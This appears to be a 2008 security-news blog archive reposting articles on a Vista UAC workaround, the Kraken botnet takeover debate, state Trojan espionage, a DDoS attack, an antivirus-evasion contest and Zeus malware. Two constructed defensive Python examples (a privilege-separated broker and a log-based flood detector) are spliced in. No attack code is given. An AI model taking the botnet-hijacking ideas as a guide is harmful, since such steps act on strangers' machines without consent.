Wednesday, April 30, 2008
Software developers from NeoSmart, a not-for-profit technology-development organisation, claim they have successfully bypassed User Account Control, a security feature in Windows Vista.
The developers suggested on their website on Sunday that the feature was "only there to give the impression of security". Critics, however, have said that, by coding around User Account Control (UAC), the developers had simply done what Microsoft had intended them to do.
UAC is a controversial feature of Vista designed to stop users from installing or executing arbitrary code. Many see it as a hindrance to performing everyday tasks, as it requests confirmation for many actions where no user confirmation was needed in Vista's predecessor, XP. UAC does not request these confirmations from users with administrator privileges, but, in Vista, users do not by default have this status.
The NeoSmart developers are behind a tool, iReboot, that helps users choose which operating system they would like to reboot into. UAC had stopped the application from running at start-up, but the developers now claim to have bypassed UAC by splitting iReboot into two. One of the parts, running in the background, has privileged access to the operating system without requiring administrator approval each time the machine boots; the other part, running as a client program, interacts with this back-end service.
As the developers were able to grant the back-end part of the program privileges to run without express user approval every time the machine starts up, they claimed that Windows Vista's security limitations were "artificial at best, easy to code around, and only there to give the impression of security".
"Any program that UAC blocks from starting up 'for good security reasons' can be coded to work around these limitations with (relative) ease," wrote the developers in a blog post. "The 'architectural redesign' of Vista's security framework isn't so much a rebuilt system as much as it is a makeover, intended to give the false impression of a more secure operating system."
However, some individuals posting comments in reply to the blog post disagreed that UAC is an "artificial" security feature. "I feel your pain for having to split a simple program into two, but your ranting is way off the mark," wrote "steveg".
"You haven't coded around [UAC blocks]. Your users have granted your application administrator privileges during installation. Game over. All your base belong to us. Once you've acquired administrator rights, the machine is yours and UAC's role is done. If you had bypassed UAC without the user explicitly granting administrator rights, your rant would be completely justified; as it is, it's merely misinformed and wrong," steveg wrote.
Another poster, "Harry Johnston", said UAC had been expressly designed to force independent software developers to write code which would work in this way. "This is a perfect example of what UAC was actually invented for — to force developers to write software that works for people who aren't logged in as an administrator. Good thing too," he wrote.
These comments echoed earlier statements by Microsoft product unit manager David Cross, who said in a speech at the RSA Conference in San Francisco earlier this month that UAC was deliberately designed to "annoy users", in order to put pressure on third-party software makers to make their applications more secure.
Microsoft had not responded to a request for comment at the time of writing.
Awesome. Neosmart had to rewrite their application to work for non-admin users, which is exactly what Microsoft wanted third-party software vendors to do.....
Saying that you bypassed UAC, after being given administrator rights by the user behind the computer...is a pretty silly claim. Microsoft has stated in the past that UAC is not a hard security barrier - therefore it should be expected that applications that are purposely installed by the users could work with it.
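The service/client split described above is, from a defender's standpoint, a privilege-separation pattern: the part that runs elevated should expose only the narrow operation the client actually needs (here, choosing the next boot entry) and validate every request it receives, because once the user has granted the installer administrator rights, that background service is the privileged attack surface. The Python sketch below is an added example, not NeoSmart's iReboot code and not a Microsoft API; the boot-entry list, the JSON message format, and the in-process call that stands in for the real IPC channel (a named pipe or local socket on Windows) are assumptions made for illustration.

```python
"""Privilege-separated boot-entry broker (constructed example, not iReboot).

BootBroker stands in for the background part that runs with elevated rights;
client_request() stands in for the unprivileged client. A real service would
receive these messages over an IPC channel such as a named pipe and would call
the bootloader configuration APIs; here the "privileged" state is an in-memory
attribute so the validation logic runs anywhere.
"""
import json

# Constructed sample of boot-menu entries the broker is allowed to select.
SAMPLE_BOOT_ENTRIES = ("Windows Vista", "Windows XP", "Ubuntu 8.04")


class BootBroker:
    """Elevated component: accepts exactly two request types and nothing else."""

    def __init__(self, boot_entries):
        self.boot_entries = set(boot_entries)
        self.next_boot = None        # stands in for the real bootloader setting
        self.audit_log = []          # every decision is recorded for review

    def handle(self, raw_request: str) -> dict:
        """Validate one request from the client and act only on allowed input."""
        try:
            req = json.loads(raw_request)
        except ValueError:
            self.audit_log.append("rejected: malformed JSON")
            return {"ok": False, "error": "malformed request"}
        if not isinstance(req, dict):
            self.audit_log.append("rejected: request is not an object")
            return {"ok": False, "error": "malformed request"}

        action = req.get("action")
        if action == "list_entries":
            return {"ok": True, "entries": sorted(self.boot_entries)}

        if action == "set_next_boot":
            target = req.get("entry")
            # Allowlist check: the client may only pick a known entry, never
            # supply a path, a command line or anything else to act on elevated.
            if target not in self.boot_entries:
                self.audit_log.append(f"rejected: unknown entry {target!r}")
                return {"ok": False, "error": "unknown boot entry"}
            self.next_boot = target
            self.audit_log.append(f"set_next_boot {target!r}")
            return {"ok": True, "next_boot": target}

        # Anything else (e.g. "run_command") is refused: the elevated part must
        # not grow into a general-purpose "do this as admin" interface.
        self.audit_log.append(f"rejected: action {action!r} not permitted")
        return {"ok": False, "error": "action not permitted"}


def client_request(broker: BootBroker, action: str, **fields) -> dict:
    """Unprivileged client: serialises a request and hands it to the broker."""
    return broker.handle(json.dumps({"action": action, **fields}))


def demo():
    """Exercise the broker; returns the responses so they can be checked."""
    broker = BootBroker(SAMPLE_BOOT_ENTRIES)
    results = {
        "list": client_request(broker, "list_entries"),
        "good": client_request(broker, "set_next_boot", entry="Ubuntu 8.04"),
        "bad_entry": client_request(broker, "set_next_boot", entry="C:\\not-an-entry.exe"),
        "bad_action": client_request(broker, "run_command", cmd="whoami"),
        "garbage": broker.handle("not json at all"),
    }
    results["next_boot"] = broker.next_boot
    results["audit"] = list(broker.audit_log)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The point of the design is visible in the audit log: the only way the unprivileged half can influence the elevated half is by naming one of the entries the broker already knows about, so a compromise of the client (or of the channel between the two) yields nothing more than a choice of which installed OS boots next.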
BT is to develop an alternative method of recording your opt-out status with Phorm, as opposed to the default cookie-based system, which relies on your computer storing a cookie to indicate that you are not a Phorm user. This follows TalkTalk's decision to take the same path back in March and is good news for consumers, as it will ensure the opt-in or opt-out status of your account is held more reliably and can also work across multiple computers on the same Internet connection.
Earlier this month the Information Commissioner's Office (ICO) announced that ISPs using the Phorm system had to make it opt-in to comply with European law. This is definitely a step forward for the consumer, but ISPs TalkTalk and BT Retail had already pre-empted this to help ensure consumer confidence in the system.
There are, however, still concerns with regard to the legality of the opt-in where computers are used by multiple people. Nicholas Bohm of the Foundation for Information Policy Research (FIPR) has indicated in his legal analysis of Phorm (PDF) that the EU law referenced above by the ICO actually requires consent from the "data subject", which could be any user of the computer or connection, not just the person who ordered the service or pays the bills (paragraphs 55-58). In a letter to LINX he goes on to explain that ISPs will need to get consent from all users, stating that one possible way to do this is to have the subscriber to the service promise that they are authorised to act on behalf of all users. This could well be a flawed approach, as it is unlikely to be the case, particularly for unknown future users of the computer. With no easy way to actually identify the person using the computer, time will have to tell what approach ISPs take to this.
Eight months after the nation's chancellor accused China of information attacks, Germany now faces criticism over its intelligence agency's use of software designed to spy on other countries' officials.
The latest incident, which began in June 2006, involved Germany's intelligence agency -- the Bundesnachrichtendienst (BND) -- launching an information attack against the Ministry of Commerce and Industry of Afghanistan, ostensibly an ally, according to media reports. Using a Trojan horse, the intelligence agents were able to read an Afghan government official's e-mail, including his correspondence with a reporter working for the German news magazine Der Spiegel, and data stored on the compromised PC's hard drive. The German Constitution protects the secrecy of telecommunications, but BND's legal counsel concluded that, because the messages were stored communications, they did not fall under the constitutional protection, Der Spiegel reported.
The operation ended in November 2006, when a whistleblower sent a letter to his superiors warning of the surveillance, the magazine reported. In February 2008, an anonymous BND employee notified two members of Germany's parliament of the intelligence agency's wiretapping activities. The incident only recently came to light during a parliamentary hearing two weeks ago.
Germany's Interior Minister Wolfgang Schaeuble raised the specter of terrorism during a TV interview to defend the cyber-espionage tactics as necessary. "It's about a few isolated cases," he said, according to an Associated Press report.
The revelation that German intelligence stole information from another country using malicious code is the latest incident of national spying. In November, Germany accused Chinese intelligence officials of spying on its government computer systems. In the United States, the government agency responsible for spying on other countries -- and defending American communications against eavesdropping -- remains accused of wiretapping communications between U.S. citizens and foreign terrorism suspects. And this week, four private investigators in Israel were sentenced to prison for their role in using Trojan horse programs to spy on clients' rivals.
In a previous controversial incident in Germany, BND agents used a Trojan horse to compromise computers of the Democratic Republic of the Congo, aiming to gather information to help German peacekeepers stationed in the troubled nation.
Der Spiegel is considering filing a lawsuit against the intelligence agency, the magazine stated in its coverage of the incident.
A village in England will host a robot hide-and-seek exercise next month, when 11 teams drawn from private companies and universities compete to sniff out snipers, roadside bombs, and other hidden dangers while relaying real-time images to a command post.
The MOD Grand Challenge, as it's called, is billed as the U.K. Ministry of Defense's counterpart to the U.S. DARPA Challenges, except it's military robots that compete against one another instead of robotic cars.
The purpose is to boost development of small robot teams capable of scouting out and alerting troops to potentially dangerous surprises on the urban battlefield. The robots must autonomously negotiate complex, unfamiliar terrain and urban clutter to locate the threats. Points are earned based on the number of threats uncovered in one hour. Points are lost if a team resorts to remote control to maneuver its bots at any stage.
One team, Stellar Consortium, will employ two unmanned aerial vehicles equipped with thermal, visual, and radar sensors to provide surveillance of the village. The data will then be used to direct a small robot on the ground.
The Swarm Systems team will field eight battery-powered, GPS-guided, Frisbee-sized, propeller-driven micro air vehicles (MAVs) called "Owls." These airborne bots hover and dart like birds while communicating with one another and a base station using Wi-Fi.
The highest-scoring team gets a shot at a lucrative MOD contract and a chance to see its system put to work in Afghanistan or southern Iraq.
China is constructing a major underground nuclear submarine base near Sanya, on Hainan Island off its southern coast, Jane's can confirm. Although Asian military sources have disclosed this fact to Jane's since 2002, high-resolution commercially available satellite imagery from DigitalGlobe allows independent verification of the previous suggestions.
The extent of construction indicates the Sanya base (also known as Yulin) could become a key future base for People's Liberation Army Navy (PLAN) aircraft carriers and other power-projection ships. In December 2007, perhaps in concert with a major PLAN exercise the previous month, the PLA moved its first Type 094 second-generation nuclear ballistic missile submarine (SSBN) to Sanya.
An underground submarine base and the positioning of China's most advanced sub-surface combatants at Sanya would have implications for China's control of the South China Sea and the strategically vital straits in the area. Further satellite imagery suggests the construction of Sanya has been supported by a gradual military build-up in the Paracel Islands over the last 20 years, and the transformation of the Chinese-occupied features in the Spratly Island group into assets that could support a range of military operations.
China's nuclear and naval build-up at Sanya underlines Beijing's desire to assert tighter control over this region. China's increasing dependence on imported petroleum and mineral resources has contributed to an intensified Chinese concern about defending its access to vital sea lanes, particularly to its south. It is this concern that in large part is driving China's development of power-projection naval forces such as aircraft carriers and long-range nuclear submarines.
China has pursued this build-up at Sanya with little fanfare, offering no public explanations regarding its plan to base nuclear weapons or advanced naval platforms there.
For both regional and extra-regional powers, it will be difficult to ignore that China is now building a major naval base at Sanya and may be preparing to house and protect a large proportion of its nuclear forces here, and even operate them from this base. This development so close to the Southeast Asian sea lanes so vital to the economies of Asia can only cause concern far beyond these straits.
After quietly taking an equity stake in two-year-old startup flash memory manufacturer Spansion, IBM now plans to augment its own still emerging, futuristic "racetrack" memory with flash memory dubbed MirrorBit.
IBM envisions its highly non-volatile, endlessly rewritable racetrack memory (RM) technology as capable of storing 3,500 movies on a single handheld MP3 player within the next decade. Now, under a cross-licensing deal officially announced today, IBM will work with the world's #1 producer of NOR flash memory, Spansion, to produce RM.
Together, the two will co-develop RM, a magnetic medium with no moving parts, and MirrorBit, a "charge trapping" technology designed to increase the density of a flash memory array while keeping costs down on manufacturing.
As a particular target, the two companies are homing in on China, where Spansion employs more than 1,300 people at design centers in Beijing and Suzhou, a manufacturing plant in Suzhou, and three sales and marketing offices.
Already in use by the top ten automotive OEMs, MirrorBit is also utilized in embedded systems ranging from gaming machines and wireless devices to telecom networking equipment.
It was 1943, and an engineer with Bell Telephone was working on one of the U.S. government's most sensitive and important pieces of wartime machinery, a Bell Telephone model 131-B2. It was a top secret encrypted teletype terminal used by the Army and Navy to transmit wartime communications that could defy German and Japanese cryptanalysis.
Then he noticed something odd.
Far across the lab, a freestanding oscilloscope had developed a habit of spiking every time the teletype encrypted a letter. Upon closer inspection, the spikes could actually be translated into the plain message the machine was processing. Though he likely didn't know it at the time, the engineer had just discovered that all information processing machines send their secrets into the electromagnetic ether.
Call it a TEMPEST in a teletype.
This story of how the United States first learned about the fundamental security vulnerability called "compromising emanations" is revealed for the first time in a newly-declassified 1972 paper TEMPEST: A Signal Problem (.pdf), from the National Security Agency's secret in-house journal Cryptologic Spectrum.
"There has always been speculation about TEMPEST coming out of the Cold War period," says Joel McNamara, author of Secrets of Computer Espionage: Tactics and Countermeasures, who maintained for years the best compilation of public information on TEMPEST. "But the 1943 Bell Labs discovery is roughly ten years earlier than I would have expected."
The unnamed Bell Telephone technician was the Alexander Graham Bell of a new, secret science, in which electronic eavesdroppers -- as far away as hundreds of feet from their target -- tune into radio waves leaking from electronic equipment to steal secrets.
Building on the breakthrough, the U.S. developed and refined the science in an attempt to spy on the Soviets during the Cold War. And it issued strict standards for shielding sensitive buildings and equipment. Those rules are now known to government agencies and defense contractors as TEMPEST, and they apply to everything from computer monitors to encrypted cell phones that handle classified information.
Until now, little has been known about when and how the U.S. government began trying to protect itself from this threat, and the NSA paper tells the story well.
Tuesday, April 29, 2008
Of course, this friend knew of my background in the coffee industry and was nice enough to offer it to me, so I added it to my coffee cup collection. Well, it is less of a collection and more like a spot in my kitchen cabinet which contains a large number of coffee cups...but I digress.
According to my friend, it was acquired at the CIA gift shop in the late 90s (yea, they have/had a gift shop).
Anyways, here it is.
But guess what I found on the bottom??
Earlier this month a number of articles surfaced on the research and disagreements with regard to the size and classification of a large botnet named Kraken. At the front line of the debate were SecureWorks and Damballa. SecureWorks claims Kraken is actually Bobax and estimates the botnet to include over 185,000 compromised systems. Damballa disagrees, stating that Kraken is an entirely new botnet with a size over twice as large as Storm. Semantics aside, no one disagrees that Kraken/Bobax is among the largest of the known botnets, if not the largest.
Cody and I thought it would be interesting to examine Kraken with the specific goal of infiltrating the bot network. We started with a sample from Offensive Computing and, working from there, eventually concluded that we would indeed be able to infiltrate and take over increasingly larger portions of the Kraken botnet. Cody did most of the manual labor of protocol dissection, reverse engineering the encryption routines and eventually creating a fake Kraken server capable of overtaking a redirected zombie. His detailed write-up on the reverse engineering process is available under "Owning Kraken".
Various estimates place the overall size of the botnet somewhere between 185,000 and 600,000 zombies. This means that within a single week we would have been able to take over anywhere from 4% to 14% of the infected population ... and this is where we entered into a moral dilemma and ethical discussion. We have the ability to successfully redirect infected systems. We have the ability to provide an 'update' through the existing Kraken protocol that can simply remove the Kraken zombie (again see "Owning Kraken" for a video demonstrating this capability). Is it wrong to do so? Although this discussion is similar to that of writing "good worms" that roam the internet patching vulnerable servers, there is a key difference in that a good worm can't be stopped. Once it has been released it is a self-spreading, uncontrollable entity. In our specific case, however, we have the ability to cease at any point. It is simply a one-to-one relationship. An infected system connects to us, we supply a simple binary to kill the target process, we never hear from the infected system again and neither can the actual botnet owners' command-and-control servers.
Cody and I are both pro-"cleansing". Dave Endler, on the other hand, is against. The arguments for cleansing are obvious; the arguments against are a little more complicated. The most interesting of the points that Dave brought up is the corner case of what happens if we accidentally crash the target system? What if that target system is responsible for someone's life support? Yes, the system is already infected with a spam-delivering zombie capable of receiving arbitrary updates from malicious actors, but at least for now it's running and carrying out the rest of its functionality. As director of DVLabs, Dave's opinion overshadows that of our own, so we simply sit and monitor. What are your personal thoughts on the matter?
The TippingPoint team brings up an interesting question.
Taking down the majority of the Kraken botnet with a rogue delete/shutdown command is a very "technically sweet" solution. However, it could have very serious consequences.
First, we don't know exactly what all of these computers are doing. As Dave pointed out, one could be controlling a life support system in a hospital. Another could be controlling some SCADA system. Another could be a server at a bank or another major corporation.
What if the command doesn't work perfectly on all the bots? What if the computer running the bot is already in an unstable condition due to massive infection? Will the computer crash or just reboot?
If the "cleansing" turns out to do physical damage in the real world, who will be responsible? TippingPoint? The people that issued the command? Or the owner of the infected computer? Who knows.
From the standpoint of TippingPoint, the idea of attempting to clean the bots sounds good but brings with it too much risk... risk that the corporation doesn't need.
It reminds me of the police pursuit question. Should police chase after a criminal if it will place innocent citizens in greater danger?
It's a grey area for sure, but I think most people would rather err on the side of caution... and not chase the everyday criminal if it will endanger the public.
University of Miami officials last week acknowledged that six backup tapes from its medical school that contained more than 2 million medical records were stolen in March from a van that was transporting the data to an off-site facility.
Jacqueline Menendez, vice president of communications at the university, said a vehicle used by Archive America Ltd. to transport the patient data was broken into in downtown Coral Gables, Fla., on March 17. Thieves removed a transport case carrying the school's computer backup tapes, she said.
For reasons Menendez could not explain, Archive America waited 48 hours before finally notifying the university on Mar. 19 about the break-in and theft. Officials from the transport firm couldn't be reached.
The university posted an alert about the incident on April 17, a full month after the backup tapes were stolen. In a statement, Doctor Pascal J. Goldschmidt, senior vice president for medical affairs and dean of the University of Miami Miller School of Medicine, said, "Even though I am confident that our patients' data is safe, we felt that in the best interest of the physician-patient relationship we should be transparent in this matter."
Since the incident, Menendez said, the university has temporarily stopped transporting backup data off-site. "At this point, we're not transporting anything until we conduct our own internal evaluation of the incident and see if there's anything that could have been done differently or better," she said.
Coral Gables law enforcement officials, who are investigating the incident, have informed the school that it was likely a "random theft," Menendez noted.
The stolen backup tapes hold names, addresses, Social Security numbers and health information of all patients at university medical facilities since Jan. 1, 1999. Financial data from approximately 47,000 people may be on the missing tapes, said Menendez. Each potential victim has been contacted by the school, she said.
PRAGUE, Czech Republic (AP) - Several Web sites of the U.S.-funded Radio Free Europe/Radio Liberty have been attacked, the broadcaster said Monday, suggesting the Belarus government could be responsible.
The assault, a denial-of-service attack that floods servers with bogus traffic so legitimate visitors cannot get through, began Saturday and was continuing, the network said in a statement.
The broadcaster said it is trying to restore its Web sites.
The attack is aimed mainly at the site of Radio Free Europe's Belarus service, but Web sites serving Iran, Russia, Azerbaijan, Tajikistan, Kosovo, Macedonia, Bosnia and Croatia also have been affected, the network said.
Jeffrey Gedmin, the network's president, compared the attack to communist countries jamming U.S.-backed broadcasts during the Cold War.
"Dictators are still trying to prevent the kind of unfiltered news and information that (Radio Free Europe) provides from reaching their people," Gedmin said. "They did not succeed in the last century and they will not succeed now."
Radio Free Europe/Radio Liberty is a private, nonprofit corporation that receives funding from the U.S. government. It was established in 1949 to spread pro-Western news and promote democratic values and institutions in countries behind the Iron Curtain.
The head of the radio's Belarus service, Alexander Lukashuk, said the attack began on the 22nd anniversary of the Chernobyl nuclear catastrophe in neighboring Ukraine. He said a similar attack took place the same day one year ago but lasted only hours and did not hit services in other languages.
"We have a large Internet audience (in Belarus) that was relying on us to report live a rally of thousands of people protesting the plight of uncompensated Chernobyl victims and a government decision to build a new nuclear power station," he said.
The broadcaster suggested the government of authoritarian Belarus President Alexander Lukashenko could be behind the attack.
"It's very hard to be certain in these cases but because the target was the Belarus service it does look like it's coming from the Belarus government," said Diane Zeleny, spokeswoman for the broadcaster.
"For our listeners in Belarus, it's quite dramatic," Zeleny said. "They cannot reach us right now. This is a pretty massive attack."
There was no immediate response from the Belarussian government.
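The attack above is described only as a flood of bogus traffic that crowds out real visitors, which is exactly the condition a web operator can watch for in its own access logs before the site becomes unreachable. The Python detector below is an added example, not RFE/RL's tooling or any product's code: it parses common-log-format lines (constructed sample data, using documentation address ranges) and applies two sliding-window checks a defender would want, a per-source rate for a single address hammering the site and an aggregate rate for a distributed flood in which no one address stands out. Window sizes and thresholds are illustrative assumptions to be tuned to a site's normal traffic.

```python
"""Request-rate flood detector over web server access logs (constructed example).

flag_floods()  - per-source sliding window: which addresses exceeded the limit.
peak_rate()    - aggregate sliding window: busiest span across all sources.
The log lines are constructed for the example; they are not RFE/RL's logs.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Apache/nginx "common log format"; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return (ip, timestamp) for a well-formed line, or None for junk."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    return m.group("ip"), datetime.strptime(m.group("ts"), TS_FMT)


def _trim(window, now, window_seconds):
    """Drop timestamps older than the window (deque holds oldest first)."""
    while window and (now - window[0]) > timedelta(seconds=window_seconds):
        window.popleft()


def flag_floods(lines, window_seconds=10, threshold=20):
    """Map each offending source IP to the moment it first reached
    `threshold` requests within any `window_seconds` span."""
    recent = defaultdict(deque)
    flagged = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:          # tolerate garbled lines; never crash the monitor
            continue
        ip, ts = parsed
        q = recent[ip]
        q.append(ts)
        _trim(q, ts, window_seconds)
        if len(q) >= threshold and ip not in flagged:
            flagged[ip] = ts
    return flagged


def peak_rate(lines, window_seconds=10):
    """Largest number of requests from all sources combined in any
    `window_seconds` span (lines must be in time order)."""
    q = deque()
    peak = 0
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        _, ts = parsed
        q.append(ts)
        _trim(q, ts, window_seconds)
        peak = max(peak, len(q))
    return peak


def _fmt(ts, ip, path):
    return f'{ip} - - [{ts.strftime(TS_FMT)}] "GET {path} HTTP/1.1" 200 5120'


def build_sample_log():
    """Constructed log: one ordinary reader, one source sending 30 requests in
    about five seconds, plus a junk line the parser must tolerate."""
    base = datetime(2008, 4, 26, 12, 0, 0, tzinfo=timezone.utc)
    events = []
    for i in range(5):   # legitimate reader: one page every 12 s
        events.append((base + timedelta(seconds=12 * i), "198.51.100.7", "/belarus/news.html"))
    for i in range(30):  # flood source: roughly six requests per second
        events.append((base + timedelta(milliseconds=166 * i), "203.0.113.50", "/"))
    events.sort(key=lambda e: e[0])
    lines = [_fmt(*e) for e in events]
    lines.insert(3, "garbled line that does not parse")
    return lines


if __name__ == "__main__":
    sample = build_sample_log()
    print("flagged sources:", flag_floods(sample))
    print("peak requests per 10 s across all sources:", peak_rate(sample))
```

The per-source check is what feeds a rate-limiting or blocking rule; the aggregate check matters because in a distributed flood each bot may stay under the per-source limit, so the alert has to come from total load rather than from any one address.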
A new contest focused on testing antivirus and malware software has been announced for the DefCon hacker conference in August. Antivirus vendors are crying foul, but they could very well be ignoring one of the best opportunities to improve their own products.
Called "The Race to Zero," this sideline contest provides hackers with samples of virus and malware code. The challenge is to modify the code in such a way that it can successfully circumvent antivirus products running at a central portal at the conference.
The Race to Zero web site explains that the goal is not to crowdsource new viruses, saying, "Not all antivirus is equal, some products are far easier to circumvent than others. Poorly performing antivirus vendors should be called out." The site also states that modified samples will not be released into the wild and that a key element of the contest's big picture is that "you need to look at controlling your endpoint devices with patching, firewalling and sound security policies to remain virus free."
Race to Zero will award the overall winning team or individual for successful code that passes through the AV products in each round. In addition, other awards will be given for things like "most elegant obfuscation," "dirtiest hack of an obfuscation," "comedy value," and "most deserving of beer." Details have not been released as to what each of these awards will be (though beer appears to be involved).
Obviously, virus and malware authors don't need a conference to collaborate on attacking AV products, but that isn't stopping the vendors from slamming Race to Zero. "[The contest] will do more harm than good," TrendMicro's Paul Ferguson told Network World. "Responsible disclosure is one thing, but now actually encouraging people to do this as a contest is a little over the top."
Roger Thompson, chief research officer at AVG Technologies, says vendors are already processing 30,000 code samples each day. "It's hard to see an upside for encouraging people to write more viruses."
On the other side of this coin, however, is a mountain of criticism against AV vendors that their products are falling behind in the use of emerging techniques and technologies. As malware organizations adopt Software as a Service business models, statements on the Race to Zero web site that "signature-based antivirus is dead" and "people need to look to heuristic, statistical and behaviour-based techniques to identify emerging threats" echo a growing dissatisfaction with the AV industry.
Instead of trying to deride Race to Zero, the AV industry could have a chance at working with the contest to harness what, in reality, could turn out to be some of the best research available on new malicious techniques. "You get what you pay for," as the old saying goes, but in the case of Race to Zero, the AV industry could be passing up a veritable gold mine of free ideas on how to better fight new threats.
Fergie is a long-time friend and I hold him in great respect, but personally I feel that people need to be shown what AV really is.... just another tool.
Tons of people still think that running AV is grand protection from everything, but this just isn't true. AV provides solid protection against known threats, but new emerging threats from a targeted attack are rarely stopped. The information is out there... for all to see.
Like it or not, showing people the truth is the essence of Defcon.
Do you think lock makers love the lockpick village? Of course not.
Should we not highlight the flaws in those silly RFID chips that the government wants to stick in everything? Of course we should.
Locks and RFID cards offer a layer of protection as well.
But in the end, they are just another tool.
Can mental training improve your intelligence? No video game or mental puzzle has convincingly been shown to work. But now a group of neuropsychologists claims it has found a task that can add points to a person's IQ – and the harder you train, they say, the more you gain.
So-called "fluid intelligence", or Gf, is the ability to reason, solve new problems and think in the abstract. It correlates with professional and educational success and it appears to be largely genetic.
Past attempts to boost Gf have suggested that, although by training you can achieve great gains on the specific training task itself, those gains don't transfer to other tasks.
Now Susanne Jaeggi at the University of Michigan at Ann Arbor, US, and her colleagues say that is not true.
They invited 70 healthy adults to participate in a challenging training exercise known as the "dual n-back" task.
The first part of the exercise involves small squares on a screen that pop into a new location every three seconds. Volunteers have to press a button when the current location is a duplicate of two views earlier.
For the second part, the volunteers have to simultaneously carry out the same task with letters. Consonants are played through headphones and they have to press a button when they hear one that is the same as that heard two "plays" earlier.
If participants perform well, the interval to be tracked (n) increases, so they must match the current stimulus against the one three or more steps earlier.
Jaeggi's volunteers were trained daily for about 20 minutes for either 8, 12, 17 or 19 days (with weekends off). They were given IQ tests both before and after the training.
The researchers found that the IQ of trained individuals increased significantly more than controls – and that the more training people got, the higher the score.
It can't rival Spider-Man yet, but a new micromachine that works like a spider's silk duct might finally lead the way to producing industrial quantities of high-quality artificial spider silk.
Now German researchers have demonstrated a new method of production – an artificial version of the ducts spiders use to "spin" the silk.
Spiders' silk ducts contain glands that process a gel of simple proteins into long fibres of protein. Different glands alter the chemistry of the gel in different ways, producing silk with different properties.
The artificial duct is a glass chip shot through with tiny tubes that tries to mimic those processes.
"The best thing is to reproduce nature, instead of cutting open spiders," says Andreas Bausch of the Technical University of Munich in Germany, who led the research with Thomas Scheibel of the University of Bayreuth, also Germany.
Bausch and Scheibel are the first to create a device that so accurately recreates the chemical and physical conditions of a real silk duct.
They are also the first to make fibres containing more than one silk protein. The chip uses two – known as ADF3 and ADF4 – found in silk from the European garden spider (Araneus diadematus).
Monday, April 28, 2008
The call girl linked to the downfall of former New York Gov. Eliot Spitzer sued the founder of the "Girls Gone Wild" series on Monday for $10 million, claiming he exploited her image and name to advertise the racy videos.
Ashley Alexandra Dupre, 22, contended in the lawsuit that she was only 17 — too young to sign legally binding contracts — and drunk on spring break in 2003 when she agreed to be filmed for "Girls Gone Wild" in Miami Beach.
Dupre "did not understand the magnitude of her actions, nor that her image and likeness would be displayed in videos and DVDs," says the lawsuit filed by Miami attorney Richard C. Wolfe.
The lawsuit filed in federal court in Miami names as defendants "Girls Gone Wild" founder Joe Francis, two of his companies and a man purportedly involved in creation of two Internet sites that the lawsuit contends improperly use Dupre's image to sell DVDs and other products.
Francis, 35, has built a soft porn empire filming and marketing videos of young women exposing their breasts and being shown in other sexually provocative situations, often at public events such as Mardi Gras or spring break beach locales.
Dupre gained notoriety in March when it came out that she was the high-priced call girl, named "Kristen" in court documents, who was hired by Spitzer for at least one tryst at a posh Washington hotel. Spitzer, known as "Client 9" in the documents, resigned as New York governor a few days after the scandal broke.
Francis made a public $1 million offer for Dupre to appear in a "Girls Gone Wild" video and go on a promotional tour, then rescinded the offer after he realized he already had footage of Dupre from 2003. Dupre's lawyer warned she was only 17 when the video was shot, not 18 as Francis claimed.
Francis said in March that Dupre spent a week on a "Girls Gone Wild" bus and made seven full-length tapes after signing release papers. He also said he bought her a bus ticket home to North Carolina.
Francis said he was surprised by the lawsuit.
"It is incomprehensible that Ms. Dupre could claim she did not give her consent to be filmed by Girls Gone Wild, when in fact we have videotape of her giving consent, while showing her identification," Francis said in a statement.
What a silly story...
Airline passengers are to be screened with facial recognition technology rather than checks by passport officers, in an attempt to improve security and ease congestion, the Guardian can reveal.
From summer, unmanned clearance gates will be phased in to scan passengers' faces and match the image to the record on the computer chip in their biometric passports.
Border security officials believe the machines can do a better job than humans of screening passports and preventing identity fraud. The pilot project will be open to UK and EU citizens holding new biometric passports.
But there is concern that passengers will react badly to being rejected by an automated gate. To ensure no one on a police watch list is incorrectly let through, the technology will err on the side of caution and is likely to generate a small number of "false negatives" - innocent passengers rejected because the machines cannot match their appearance to the records.
They may be redirected into conventional passport queues, or officers may be authorised to override automatic gates following additional checks.
Ministers are eager to set up trials in time for the summer holiday rush, but have yet to decide how many airports will take part. If successful, the technology will be extended to all UK airports.
The automated clearance gates introduce the new technology to the UK mass market for the first time and may transform the public's experience of airports.
Existing biometric, fast-track travel schemes - iris and miSense - operate at several UK airports, but are aimed at business travellers who enroll in advance.
The rejection rate in trials of iris recognition, by means of the unique images of each traveller's eye, is 3% to 5%, although some were passengers who were not enrolled but jumped into the queue.
They should do this in the states....if it removes the need for me to take off my shoes.
Geez, that is a stupid rule.
Malware authors have lifted a page from the legit software industry's rule book and are slapping copyright notices on their Trojans.
One Russian-based outfit has claimed violations of its "licensing agreement" by its underworld customers will result in samples of the knock-off code being sent to anti-virus firms.
The sanction was spotted in the help files of a malware package called Zeus, detected by security firm Symantec as "Infostealer Banker-C". Zeus is offered for sale on the digital underground, and its creators want to protect their revenue stream by making the creation of knock-offs less lucrative.
The copyright notice, a reflection of a lack of trust between virus creators and their customers, is designed to prevent the malware from being freely distributed after its initial purchase. Virus writers are essentially relying on security firms to help them get around the problem that miscreants who buy their code to steal online banking credentials have few scruples about ripping it off and selling it on.
In a blog posting, Symantec security researchers have posted screen shots illustrating the "licensing agreement" for Infostealer Banker-C.
The terms of this licensing agreement demand that clients promise not to distribute the code to others and pay a fee for any update to the product that isn't a bug fix. Reverse engineering of the malware code is also verboten.
"These are typical restrictions that could be applied to any software product, legitimate or not," writes Symantec researcher Liam O'Murchu, adding that the most noteworthy section deals with sanctions for producing knock-off code (translation below).
"In cases of violations of the agreement and being detected, the client loses any technical support. Moreover, the binary code of your bot will be immediately sent to antivirus companies."
Despite the warning, copies of the malware were traded freely on the digital underground days after its release, Symantec reports. "It just goes to show you just can't trust anyone in the underground these days," O'Murchu notes.
Wow. This means that malware authors are threatening to report their own creation to AV companies if the client attempts to screw the malware author (they don't care if you steal bank records with it). It is like some type of written DRM for malware.
